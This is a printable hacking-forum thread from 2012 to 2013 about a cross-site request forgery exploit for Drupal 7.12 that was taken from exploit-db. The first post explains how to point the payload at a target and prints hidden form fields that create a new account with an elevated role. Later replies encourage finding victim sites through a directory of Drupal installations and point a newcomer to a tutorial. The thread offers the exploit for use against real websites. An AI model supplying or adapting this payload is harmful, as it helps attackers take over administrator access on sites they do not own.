Sinisterly
Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - Printable Version


Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 04-07-2012

Hello!

I came across this on exploit-db. All credits go to: Ivano Binetti (http://ivanobinetti.com)
Link to exploit: http://www.exploit-db.com/exploits/18564/


It's pretty much explained there.
For better understanding I've split the link here:

Code:
<drupal_ip> = This doesn't necessarily have to be the IP. It can be a domain.
:80 = Not really needed, as port 80 is the default. You may want to change it if a different port is used.
/drupal/ = Directory where Drupal is installed. You may want to change or delete it.
admin/ = Directory where the admin CP is installed. Many websites will have it as default.

The rest should be clear.

IMPORTANT! DON'T CHANGE THESE:
Code:
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="roles[3]" value="3"/>


<input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/>
<input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/>
<input type="hidden" name="form_id" value="user_register_form"/>
<input type="hidden" name="op" value="Create new account"/>



RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - W0rM - 04-09-2012

Go ahead...
Find some sites here
Code:
http://www.drupalsites.net/
and :smoke:
:p


RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - d3v0id - 02-09-2013

Does it still work, or is it fixed?


RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 02-09-2013

(02-09-2013, 05:13 PM)d3v0id Wrote: Does it still work, or is it fixed?

It will work for the mentioned version. Newer versions are most likely patched.


RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - Sherazkhan98 - 03-09-2013

How to use it... I'm new on this forum :(


RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities - 1llusion - 03-09-2013

(03-09-2013, 05:43 PM)Sherazkhan98 Wrote: How to use it... I'm new on this forum :(

Look into CSRF. I've made a little tut on my blog: http://blog.1llusion.info/2013/01/trolling-with-cross-site-request.html